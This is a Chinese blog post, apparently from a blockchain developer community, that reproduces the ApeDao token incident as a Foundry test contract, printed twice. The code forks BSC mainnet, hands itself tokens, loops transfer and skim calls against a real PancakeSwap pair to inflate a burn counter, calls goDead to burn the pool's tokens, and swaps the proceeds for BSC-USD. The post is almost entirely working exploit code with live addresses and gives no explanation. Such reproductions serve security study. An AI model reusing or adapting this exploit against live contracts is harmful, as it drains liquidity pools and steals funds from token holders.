ApeDao事件代码复现

Archime
更新于 2023-07-20 16:17
阅读 2531

ApeDao事件代码复现

```
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;

import "forge-std/Test.sol";
import "./interface.sol";

interface IAPEDAO is IERC20 {
    function amountToDead() view external returns (uint256);
    function goDead() external;
}

contract BNOTest is Test {
    IAPEDAO apedao = IAPEDAO(0xB47955B5B7EAF49C815EBc389850eb576C460092);

IPancakeRouter pancakeRouter = IPancakeRouter(payable(0x10ED43C718714eb63d5aA57B78B54704E256024E));
    IPancakePair pancakePair = IPancakePair(payable(0xee2a9D05B943C1F33f3920C750Ac88F74D0220c3));
    IERC20 bscusd = IERC20(0x55d398326f99059fF775485246999027B3197955);

CheatCodes cheats = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D);

function setUp() public {
        cheats.createSelectFork("bsc", 30072293);
        cheats.label(address(apedao),"apedao");
        
    }

function testExploit() public {
        deal(address(apedao),address(this),2238674491718649997652);
        emit log_named_decimal_uint("After deal attacker apedao number", apedao.balanceOf(address(this)) , apedao.decimals());
        emit log_named_decimal_uint("Before attack amountToDead number ", apedao.amountToDead() , apedao.decimals());

for(uint256 i=0;i<16;i++){
            apedao.transfer(address(pancakePair),apedao.balanceOf(address(this)));
            pancakePair.skim(address(this));
        }

emit log_named_decimal_uint("After attack amountToDead number ", apedao.amountToDead() , apedao.decimals());
        emit log_named_decimal_uint("After attack attacker apedao number", apedao.balanceOf(address(this)) , apedao.decimals());

emit log_named_decimal_uint("Before godead pancakePair apedao number ", apedao.balanceOf(address(pancakePair)) , apedao.decimals());
        apedao.goDead();
        emit log_named_decimal_uint("After godead pancakePair apedao number ", apedao.balanceOf(address(pancakePair)) , apedao.decimals());

swap();

}

function swap() internal {
        
        address[] memory path = new address[](2);
        path[0] = address(apedao);
        path[1] = address(bscusd);

uint256[] memory amounts = new uint256[](2);

amounts = pancakeRouter.getAmountsOut(apedao.balanceOf(address(this)),path);
        apedao.transfer(address(pancakePair),apedao.balanceOf(address(this)));

pancakePair.swap(amounts[1]*90/100,0,address(this),"");

emit log_named_decimal_uint("After attack bscusd balance  ", bscusd.balanceOf(address(this)) , bscusd.decimals());

}

}
```

// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;

import "forge-std/Test.sol";
import "./interface.sol";

interface IAPEDAO is IERC20 {
    function amountToDead() view external returns (uint256);
    function goDead() external;
}

contract BNOTest is Test {
    IAPEDAO apedao = IAPEDAO(0xB47955B5B7EAF49C815EBc389850eb576C460092);

    IPancakeRouter pancakeRouter = IPancakeRouter(payable(0x10ED43C718714eb63d5aA57B78B54704E256024E));
    IPancakePair pancakePair = IPancakePair(payable(0xee2a9D05B943C1F33f3920C750Ac88F74D0220c3));
    IERC20 bscusd = IERC20(0x55d398326f99059fF775485246999027B3197955);

    CheatCodes cheats = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D);

    function setUp() public {
        cheats.createSelectFork("bsc", 30072293);
        cheats.label(address(apedao),"apedao");

    }

    function testExploit() public {
        deal(address(apedao),address(this),2238674491718649997652);
        emit log_named_decimal_uint("After deal attacker apedao number", apedao.balanceOf(address(this)) , apedao.decimals());
        emit log_named_decimal_uint("Before attack amountToDead number ", apedao.amountToDead() , apedao.decimals());

        for(uint256 i=0;i&lt;16;i++){
            apedao.transfer(address(pancakePair),apedao.balanceOf(address(this)));
            pancakePair.skim(address(this));
        }

        emit log_named_decimal_uint("After attack amountToDead number ", apedao.amountToDead() , apedao.decimals());
        emit log_named_decimal_uint("After attack attacker apedao number", apedao.balanceOf(address(this)) , apedao.decimals());

        emit log_named_decimal_uint("Before godead pancakePair apedao number ", apedao.balanceOf(address(pancakePair)) , apedao.decimals());
        apedao.goDead();
        emit log_named_decimal_uint("After godead pancakePair apedao number ", apedao.balanceOf(address(pancakePair)) , apedao.decimals());

        swap();

    }

    function swap() internal {

        address[] memory path = new address[](2);
        path[0] = address(apedao);
        path[1] = address(bscusd);

        uint256[] memory amounts = new uint256[](2);

        amounts = pancakeRouter.getAmountsOut(apedao.balanceOf(address(this)),path);
        apedao.transfer(address(pancakePair),apedao.balanceOf(address(this)));

        pancakePair.swap(amounts[1]*90/100,0,address(this),"");

        emit log_named_decimal_uint("After attack bscusd balance  ", bscusd.balanceOf(address(this)) , bscusd.decimals());

    }

}

学分: 5
分类: 安全
标签: 安全事件分析

本文参与登链社区写作激励计划，好文好收益，欢迎正在阅读的你也加入。

ApeDao事件代码复现

0 条评论

文章目录